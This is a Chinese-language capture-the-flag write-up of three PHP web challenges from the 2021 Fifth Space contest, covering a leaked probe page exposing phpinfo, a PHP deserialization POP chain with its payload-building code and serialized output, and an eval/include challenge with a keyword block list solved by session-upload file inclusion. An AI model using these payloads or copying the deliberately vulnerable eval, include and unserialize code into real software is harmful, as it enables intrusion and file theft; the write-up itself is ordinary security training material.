2021第五空间网络安全大赛

WebFTP

https://github.com/wifeat/WebFTP
根据github的源码，去对网站进行分析，有写到初始账号

但是题目改了密码，登不进
然后下载到题目的Config.php.bak，看到版本是v2.3

出现了git泄漏，无法下载到文件，但是看到了目录结构
找到探针
http://114.115.185.167:32770/Readme/mytz.php

http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo
直接找到flag

pklovecloud

源码：

<?php  
include 'flag.php';
class pkshow 
{
    
      
    function echo_name()     
    {
    
              
        return "Pk very safe^.^";      
    }  
} 

class acp 
{
    
       
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {
    
          
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {
    
              
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{
    
        
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {
    
       
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
    
    
        $file = "./{
      
      $this->filename}";
            if (file_get_contents($file))         
            {
    
                  
                return file_get_contents($file); 
            }  
            else 
            {
    
     
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    
    
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{
    
     
    highlight_file(__file__); 
}
?>

这个有一个挺有意思的一个就是，在ace里面，会反序列化docker
而后面他访问的属性是acp里面的，说明我们的docker里面得放acp序列化的内容
而判断条件里面：$this->openstack->neutron === $this->openstack->nova
那么就这样构造acp

<?php
class acp 
{
    
       
    protected $cinder;  
    public $neutron = 'a';
    public $nova = 'a';
}
$a = new acp();
echo serialize($a);

得到：O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}

有echo，会触发toString方法，这样的话就可以在析构方法里面把pkshow换成ace，从而换成ace的echo_name()方法

<?php
class ace
{
    
        
    public $filename = 'flag.php';     
    public $openstack;
    public $docker = 'O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}'; 
}
class acp 
{
    
       
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {
    
          
        $this->cinder = new ace();
    }
}
$a = new acp();
echo urlencode(serialize($a));

得到flag

EasyCleanup

<?php

if(!isset($_GET['mode'])){
    
    
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    
    
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}


if(isset($_GET['file'])){
    
    
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}


function filter($var): bool{
    
    
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];

    foreach($banned as $ban){
    
    
        if(strstr($var, $ban)) return True;
    }

    return False;
}

function checkNums($var): bool{
    
    
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
    
    
        for($j = 0; $j < strlen($var); $j++){
    
    
            if($var[$j] == $alphanum[$i]){
    
    
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}

?>

注意到了这里的一个双问号符，是php7引入的

$a ?? 0 等同于 isset($a) ? $a : 0

$_GET['shell'] ?? 'phpinfo();'

看一下phpinfo
http://114.115.134.72:32770/?mode=eval

看到题目名字Cleanup就想到了可能是session_upload
刚好这里有一个文件包含，那么就应该没跑了

第一个包

第二个包

成功rce


flag{8b39ace789479585ae8b1e16c113161a}